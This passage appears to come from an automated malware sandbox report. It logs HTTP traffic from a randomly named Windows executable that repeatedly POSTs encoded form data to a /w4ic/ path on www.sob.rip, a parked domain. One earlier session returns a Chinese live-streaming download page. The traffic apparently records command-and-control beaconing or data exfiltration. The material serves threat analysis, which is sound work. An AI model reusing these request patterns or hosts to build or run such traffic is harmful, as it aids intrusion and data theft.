                                                                                                                                                                                                                                              Data Raw: 66 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 67 62 32 33 31 32 22 3e 3c 74 69 74 6c 65 3e 26 23 34 30 36 33 35 3b 26 23 33 36 37 37 31 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 32 37 37 30 34 3b 26 23 32 30 30 33 37 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 39 32 35 36 3b 26 23 32 34 32 31 32 3b 26 23 32 39 39 39 32 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 26 23 33 31 34 34 39 3b f0 9f 8e b9 26 23 34 30 36 33 35 3b 26 23 33 36 37 37 31 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 32 33 34 34 38 3b 26 23 32 36 30 34 31 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 76 31 2e 32 2e 30 30 31 2d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: ffc0<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta charset="gb2312"><title>&#40635;&#36771;&#30452;&#25773;&#27704;&#20037;&#20813;&#36153;&#29256;&#24212;&#29992;&#19979;&#36733;&#31449;&#40635;&#36771;&#30452;&#25773;&#23448;&#26041;&#19979;&#36733;v1.2.001-</title><meta name="shenma-site-verification" content="2cc3f179526d8b55faf4b5ea962c450a_1578036476"><meta name="description" content="&#40635;&#36771;&#30452;&#25773;APP&#26159;&#19968;&#27454;&#38598;&#23089;&#20048;&#31038;&#20132;&#20114;&#21160;&#20110;&#19968;&#20307;&#30340;&#30452;&#25773;&#24179;&#21488;,&#26088;&#22312;&#20026;&#29992;&#25143;&#25552;&#20379;&#20016;&#23500;&#22810;&#26679;&#30340;&#30452;&#25773;&#20869;&#23481;&#21644;&#39640;&#21697;&#36136;&#30340;&#35266;&#30475;&#20307;&#39564;&#26080;&#35770;&#29992;&#25143;&#26159;&#23547;&#25214;&#25165;&#33402;&#23637;&#31034;&#29983;&#27963;&#20998;&#20139;&#36824;&#26159;&#30693;&#35782;&#202 [TRUNCATED]
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789597034 CET1236INData Raw: 3b 26 23 33 37 31 31 37 3b 26 23 33 33 30 32 31 3b 26 23 32 38 33 38 35 3b 26 23 33 36 32 37 35 3b e3 80 82 26 23 34 30 36 33 35 3b 26 23 33 36 37 37 31 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b e3 80 82 22 3e 3c 6d 65 74 61 20 6e 61 6d
                                                                                                                                                                                                                                              Data Ascii: ;&#37117;&#33021;&#28385;&#36275;&#40635;&#36771;&#30452;&#25773;"><meta name="keywords" content="&#40635;&#36771;&#30452;&#25773;,&#40635;&#36771;&#30452;&#25773;app&#19979;&#36733;,&#40635;&#36771;&#30452;&#25773;&#23448;&#26041;&#2636
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789674044 CET1236INData Raw: 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 62 49 73 49 70 61 64 20 3d 20 75 61 2e 6d 61 74 63 68 28 2f 69 70 61 64 2f 69 29 20 3d 3d 20 22 69 70 61 64 22 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 62 49 73 49 70 68 6f 6e 65 4f 73 20 3d 20 75 61 2e
                                                                                                                                                                                                                                              Data Ascii: ; var bIsIpad = ua.match(/ipad/i) == "ipad"; var bIsIphoneOs = ua.match(/iphone os/i) == "iphone os"||ua.match(/iphone; cpu os/i) == "iphone; cpu os"; var bIsAndroid = ua.match(/android/i) == "android"; var bIsW
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789711952 CET1236INData Raw: 62 6f 2e 6e 65 74 2f 75 65 6e 6c 62 2f 22 3e e5 ba 94 e7 94 a8 3c 2f 61 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 32 30 32 34 38 20 6e 61 76 2d 6c 69 6e 6b 20 20 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 72 65 6e 7a 68 69 62 6f 2e
                                                                                                                                                                                                                                              Data Ascii: bo.net/uenlb/"></a><a class="n20248 nav-link " href="http://www.mirenzhibo.net/binc/"></a><a class="o510a4 nav-link " href="http://www.mirenzhibo.net/djs/"></a><a class="p0a89d nav-link " href="http://www.mirenzhibo.net/ym
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789762974 CET1236INData Raw: 22 3e 3c 69 6d 67 20 64 72 61 67 67 61 62 6c 65 3d 22 37 33 36 31 31 66 22 20 63 6c 61 73 73 3d 22 7a 31 64 30 38 36 20 70 69 63 22 20 73 72 63 3d 22 2f 67 61 6d 65 2d 69 6d 67 2f 69 6d 61 67 65 5f 31 37 31 2e 6a 70 67 22 20 61 6c 74 3d 22 20 20
                                                                                                                                                                                                                                              Data Ascii: "><img draggable="73611f" class="z1d086 pic" src="/game-img/image_171.jpg" alt=" v3.5.2"><ins draggable="c3d9e2"></ins><small dropzone="aaeea6"></small><sup date-time="c2812f"></sup><dl class="ab7b58 con"><dt><h1 class="bd11f0 title">&#40635;
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789799929 CET1236INData Raw: 37 30 36 38 35 38 2e 70 6e 67 22 20 61 6c 74 3d 22 e4 b8 8b e8 bd bd 22 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 69 6d 67 20 64 72 6f 70 7a 6f 6e 65 3d 22 35 31 30 61 34 33 22 20 73 72 63 3d 22 2f 74 65 6d 70 6c 61 74 65 2f 6e 65 77 73 2f 67 6f 2f 61 64
                                                                                                                                                                                                                                              Data Ascii: 706858.png" alt=""></li><li><img dropzone="510a43" src="/template/news/go/addons/code/20231109024706718.png" alt=""></li><li><img date-time="0a89d6" src="/template/news/go/addons/code/20231109024706557.png" alt=""></li><li><i
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789870024 CET1236INData Raw: 80 90 e5 ba 94 e7 94 a8 e7 89 b9 e8 89 b2 e3 80 91 3c 2f 68 33 3e 3c 70 3e e3 80 80 e3 80 80 31 2e e3 80 90 e5 85 a8 e6 b0 91 e7 9b b4 e6 92 ad e3 80 91 e2 9b a9 3c 2f 70 3e 3c 70 3e e3 80 80 e3 80 80 32 2e e3 80 90 e6 99 ba e8 83 bd e7 be 8e e9
                                                                                                                                                                                                                                              Data Ascii: </h3><p>1.</p><p>2.</p><p>3.</p><p>4.</p><h3 class="l78b4e rt"></h3><p>1.
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789908886 CET1236INData Raw: 64 69 72 3d 22 32 61 30 35 36 65 22 3e 3c 2f 69 6e 73 3e 3c 73 6d 61 6c 6c 20 6c 61 6e 67 3d 22 32 31 39 65 66 35 22 3e 3c 2f 73 6d 61 6c 6c 3e 3c 73 75 70 20 64 72 61 67 67 61 62 6c 65 3d 22 63 37 32 64 31 30 22 3e 3c 2f 73 75 70 3e 3c 64 69 76
                                                                                                                                                                                                                                              Data Ascii: dir="2a056e"></ins><small lang="219ef5"></small><sup draggable="c72d10"></sup><div draggable="98879c" class="t2b35a section-hd"><h3 class="u4b5e5 title"></h3></div><time dropzone="4406c9"></time><tt date-time="994047"></tt><var dir
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789948940 CET1236INData Raw: 63 3d 22 2f 67 61 6d 65 2d 69 6d 67 2f 69 6d 61 67 65 5f 31 32 32 2e 6a 70 67 22 20 20 61 6c 74 3d 22 e6 9a 96 e6 9a 96 e8 a7 86 e9 a2 91 e5 85 8d e8 b4 b9 e9 ab 98 e6 b8 85 e5 9c a8 e7 ba bf e8 a7 82 e7 9c 8b 22 3e 3c 6d 61 70 20 64 72 6f 70 7a
                                                                                                                                                                                                                                              Data Ascii: c="/game-img/image_122.jpg" alt=""><map dropzone="4f6638"></map><bdo date-time="9c3bbf"></bdo><dfn dir="95efec"></dfn><div date-time="105098" class="e68078 tit"></div><fo
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789988041 CET1236INData Raw: 34 35 22 3e 3c 2f 66 6f 6e 74 3e 3c 64 69 76 20 64 69 72 3d 22 33 38 30 65 36 38 22 20 63 6c 61 73 73 3d 22 6d 38 33 31 63 30 20 74 69 74 22 3e e7 bb bf e5 b7 a8 e4 ba ba e8 8c 84 e5 ad 90 e9 a6 99 e8 95 89 e6 a6 b4 e8 8e b2 e8 8d 89 e8 8e 93 e4
                                                                                                                                                                                                                                              Data Ascii: 45"></font><div dir="380e68" class="m831c0 tit"></div><ins dropzone="6f2d1f"></ins><small date-time="8cfd0e"></small><sup dir="2ba551"></sup><div lang="78b4ed" class="ncbf49 btn btn-link"></di
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.909727097 CET1236INData Raw: 61 62 6c 65 3d 22 66 61 32 30 38 64 22 3e 3c 2f 74 69 6d 65 3e 3c 64 69 76 20 64 72 61 67 67 61 62 6c 65 3d 22 63 36 32 38 65 30 22 20 63 6c 61 73 73 3d 22 76 63 32 34 34 63 20 62 74 6e 20 62 74 6e 2d 6c 69 6e 6b 22 3e e6 9f a5 e7 9c 8b e8 af a6
                                                                                                                                                                                                                                              Data Ascii: able="fa208d"></time><div draggable="c628e0" class="vc244c btn btn-link"></div></a></li><li class="w113c7 item"><a href="http://wwg.hblbs.cn/l/9.html"><img dropzone="6b7521" class="x95333 pic lazy" src="/game-img/image_124.jpg" dat


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              13192.168.2.449889199.59.243.227804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:16.764659882 CET674OUTPOST /w4ic/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.sob.rip
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.sob.rip
                                                                                                                                                                                                                                              Referer: http://www.sob.rip/w4ic/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 200
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 2f 51 53 64 5a 6f 64 51 53 6b 39 47 61 2b 7a 54 78 59 32 54 45 36 4e 48 36 56 2f 4b 7a 6d 7a 59 58 7a 77 32 57 46 58 47 65 58 57 46 4f 52 31 6a 47 34 39 2b 57 63 6a 64 55 31 41 2b 70 2b 4a 74 78 4b 42 44 62 49 6c 6d 64 6b 7a 58 33 72 72 5a 6e 46 4a 42 42 4e 30 56 47 70 52 54 49 55 63 70 6e 76 49 39 5a 63 4a 66 43 71 39 38 57 33 35 55 5a 59 66 4a 47 53 58 53 43 6e 48 71 51 72 49 77 76 73 75 6e 54 55 54 39 64 33 36 74 69 33 52 43 7a 77 35 45 75 46 46 67 57 73 42 4a 4d 50 56 57 75 65 32 72 49 66 35 75 2f 50 39 48 54 58 51 62 59 52 71 58 68 6d 68 4c 76 79 34 39 2b 49 4a 71 64 77 3d 3d
                                                                                                                                                                                                                                              Data Ascii: 4v7=/QSdZodQSk9Ga+zTxY2TE6NH6V/KzmzYXzw2WFXGeXWFOR1jG49+WcjdU1A+p+JtxKBDbIlmdkzX3rrZnFJBBN0VGpRTIUcpnvI9ZcJfCq98W35UZYfJGSXSCnHqQrIwvsunTUT9d36ti3RCzw5EuFFgWsBJMPVWue2rIf5u/P9HTXQbYRqXhmhLvy49+IJqdw==
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:17.847529888 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              date: Mon, 23 Dec 2024 03:09:16 GMT
                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                              content-length: 1094
                                                                                                                                                                                                                                              x-request-id: 0793a80b-2237-44cb-a731-80eb880ac602
                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_lUb+pzwDolo2M+lKa0amaje5bjXzIBh4zIw5l5+ADOD5jcEy6LxOPMBnEyiuOIWgHO320qEqRMshvTFLVtYFbw==
                                                                                                                                                                                                                                              set-cookie: parking_session=0793a80b-2237-44cb-a731-80eb880ac602; expires=Mon, 23 Dec 2024 03:24:17 GMT; path=/
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6c 55 62 2b 70 7a 77 44 6f 6c 6f 32 4d 2b 6c 4b 61 30 61 6d 61 6a 65 35 62 6a 58 7a 49 42 68 34 7a 49 77 35 6c 35 2b 41 44 4f 44 35 6a 63 45 79 36 4c 78 4f 50 4d 42 6e 45 79 69 75 4f 49 57 67 48 4f 33 32 30 71 45 71 52 4d 73 68 76 54 46 4c 56 74 59 46 62 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_lUb+pzwDolo2M+lKa0amaje5bjXzIBh4zIw5l5+ADOD5jcEy6LxOPMBnEyiuOIWgHO320qEqRMshvTFLVtYFbw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:17.847604036 CET547INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDc5M2E4MGItMjIzNy00NGNiLWE3MzEtODBlYjg4MGFjNjAyIiwicGFnZV90aW1lIjoxNzM0OTIzMz


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              14192.168.2.449897199.59.243.227804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:19.427659988 CET694OUTPOST /w4ic/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.sob.rip
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.sob.rip
                                                                                                                                                                                                                                              Referer: http://www.sob.rip/w4ic/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 220
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 2f 51 53 64 5a 6f 64 51 53 6b 39 47 5a 66 6a 54 39 62 65 54 54 4b 4e 45 31 31 2f 4b 68 6d 7a 45 58 7a 38 32 57 41 6e 57 5a 6c 79 46 4f 31 35 6a 46 39 42 2b 52 63 6a 64 62 56 41 33 6e 65 4a 6d 78 4b 45 2b 62 4a 4a 6d 64 6b 6e 58 33 76 37 5a 6d 79 6c 41 41 64 30 4c 4e 4a 52 52 58 6b 63 70 6e 76 49 39 5a 63 64 31 43 75 52 38 4b 58 4a 55 66 39 6a 4b 4f 79 58 56 53 33 48 71 43 62 49 38 76 73 76 79 54 51 62 62 64 31 79 74 69 33 42 43 7a 6b 4e 48 31 56 46 6d 4c 38 41 4b 49 4f 6b 42 75 63 58 37 43 38 68 43 31 50 35 66 57 52 64 42 4a 67 4c 41 7a 6d 46 34 79 31 78 4a 7a 4c 30 6a 47 36 67 7a 46 44 77 73 4f 2b 67 65 58 61 55 36 54 77 71 5a 72 7a 6b 3d
                                                                                                                                                                                                                                              Data Ascii: 4v7=/QSdZodQSk9GZfjT9beTTKNE11/KhmzEXz82WAnWZlyFO15jF9B+RcjdbVA3neJmxKE+bJJmdknX3v7ZmylAAd0LNJRRXkcpnvI9Zcd1CuR8KXJUf9jKOyXVS3HqCbI8vsvyTQbbd1yti3BCzkNH1VFmL8AKIOkBucX7C8hC1P5fWRdBJgLAzmF4y1xJzL0jG6gzFDwsO+geXaU6TwqZrzk=
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:20.511162043 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              date: Mon, 23 Dec 2024 03:09:19 GMT
                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                              content-length: 1094
                                                                                                                                                                                                                                              x-request-id: 9a373364-4084-42f5-bf96-6789ccd72283
                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_lUb+pzwDolo2M+lKa0amaje5bjXzIBh4zIw5l5+ADOD5jcEy6LxOPMBnEyiuOIWgHO320qEqRMshvTFLVtYFbw==
                                                                                                                                                                                                                                              set-cookie: parking_session=9a373364-4084-42f5-bf96-6789ccd72283; expires=Mon, 23 Dec 2024 03:24:20 GMT; path=/
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6c 55 62 2b 70 7a 77 44 6f 6c 6f 32 4d 2b 6c 4b 61 30 61 6d 61 6a 65 35 62 6a 58 7a 49 42 68 34 7a 49 77 35 6c 35 2b 41 44 4f 44 35 6a 63 45 79 36 4c 78 4f 50 4d 42 6e 45 79 69 75 4f 49 57 67 48 4f 33 32 30 71 45 71 52 4d 73 68 76 54 46 4c 56 74 59 46 62 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_lUb+pzwDolo2M+lKa0amaje5bjXzIBh4zIw5l5+ADOD5jcEy6LxOPMBnEyiuOIWgHO320qEqRMshvTFLVtYFbw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:20.511205912 CET547INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWEzNzMzNjQtNDA4NC00MmY1LWJmOTYtNjc4OWNjZDcyMjgzIiwicGFnZV90aW1lIjoxNzM0OTIzMz


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              15192.168.2.449903199.59.243.227804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:22.085154057 CET10776OUTPOST /w4ic/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.sob.rip
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.sob.rip
                                                                                                                                                                                                                                              Referer: http://www.sob.rip/w4ic/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 10300
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 2f 51 53 64 5a 6f 64 51 53 6b 39 47 5a 66 6a 54 39 62 65 54 54 4b 4e 45 31 31 2f 4b 68 6d 7a 45 58 7a 38 32 57 41 6e 57 5a 6c 36 46 4f 6d 78 6a 46 65 70 2b 51 63 6a 64 46 46 41 36 6e 65 4a 33 78 4f 67 36 62 4a 56 32 64 6d 66 58 34 74 7a 5a 68 44 6c 41 4b 64 30 4c 43 70 52 53 49 55 63 38 6e 76 59 78 5a 63 4e 31 43 75 52 38 4b 55 52 55 49 34 66 4b 49 79 58 53 43 6e 48 6d 51 72 49 51 76 73 33 69 54 51 58 74 64 47 4b 74 6c 54 64 43 79 58 6c 48 6f 46 46 6b 49 38 41 6f 49 4f 70 47 75 63 37 33 43 2f 39 73 31 4e 6c 66 62 6c 31 62 65 68 6a 58 6e 57 4a 6b 6e 79 4e 66 32 36 51 47 66 4a 63 76 46 69 6b 37 59 65 31 77 59 71 56 4d 50 46 79 68 78 56 4a 4e 72 38 57 57 37 6b 6d 4c 2b 32 38 68 77 30 57 4a 47 68 33 38 43 30 58 51 43 4e 4e 69 4c 53 4c 49 76 68 6d 68 43 57 70 65 72 6f 75 47 4a 75 6f 33 51 73 42 49 51 4d 37 31 61 79 4b 6e 68 6d 65 47 2f 79 49 53 39 37 71 76 4e 42 7a 79 70 61 79 74 33 43 63 4e 63 2f 65 4b 34 37 36 51 4b 54 6e 50 39 2f 44 43 2f 55 53 77 55 6f 74 41 45 54 74 49 44 38 79 30 4f 7a [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 4v7=/QSdZodQSk9GZfjT9beTTKNE11/KhmzEXz82WAnWZl6FOmxjFep+QcjdFFA6neJ3xOg6bJV2dmfX4tzZhDlAKd0LCpRSIUc8nvYxZcN1CuR8KURUI4fKIyXSCnHmQrIQvs3iTQXtdGKtlTdCyXlHoFFkI8AoIOpGuc73C/9s1Nlfbl1behjXnWJknyNf26QGfJcvFik7Ye1wYqVMPFyhxVJNr8WW7kmL+28hw0WJGh38C0XQCNNiLSLIvhmhCWperouGJuo3QsBIQM71ayKnhmeG/yIS97qvNBzypayt3CcNc/eK476QKTnP9/DC/USwUotAETtID8y0OzgKoNIgTcgBCgFSXzWa4idI7C1TWQ9pFozIoN0Ogjhb+zdYAyPuDsy81o4jbGInl/C/J1mFgAQ5rnmMm7I216mwF60mqL5F/V4n++Uzy9rbeljJ2qpoUPR+BU/d4llf8FBYHMK0WIkWofoORHke23mcTjYmaxoXeFyrQYoGoP8tDNaknDpG/h9teofJBwouvDr4nnxn2Q4HuQvlHszzRAwgBEpmlJweO0b5UjHbgPOu4y+J0j0EjZ0VdcHcCt34Jef8x/GOaAb1EBZF0300xz3O0ycmff367tN+pdXnCrY7A2pG8LBTrezXoNAw7EHV0l5cDydFP7x9xU8QKGDv46qPHZ9cP8zYNcvXhRq5kKo32ZxRgC02gUisDESnucL2nIZWegXdOo8tKJUvpPLQibRZX5M/RrhTR7UtnnP7DrovbfGj5JwP7E9iDyFV42IAG9SMDi6eMI1Mld65Q9tOV1COZ/lzopo83Ikld9Twyg6nuATOpr0TwzLE+x9S6y/3anbBLpWFbfl9PWnRuBNsj1k7/gG0WnwHkUvucLzXPJGXv1MlyNEayQ96gAOsfTZ1mspKCadeNdJT3s9a2VvICMT05S+/l+mGCpgaBogFZePDXYj7oRUa8BEipRxC46s91b/MFNBc34a3muXtW3GoQ4fYNkv87/3iJYW+ [TRUNCATED]
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:23.180619001 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              date: Mon, 23 Dec 2024 03:09:22 GMT
                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                              content-length: 1094
                                                                                                                                                                                                                                              x-request-id: 145aefb2-d1c7-42bf-8667-82fa82c9bdb9
                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
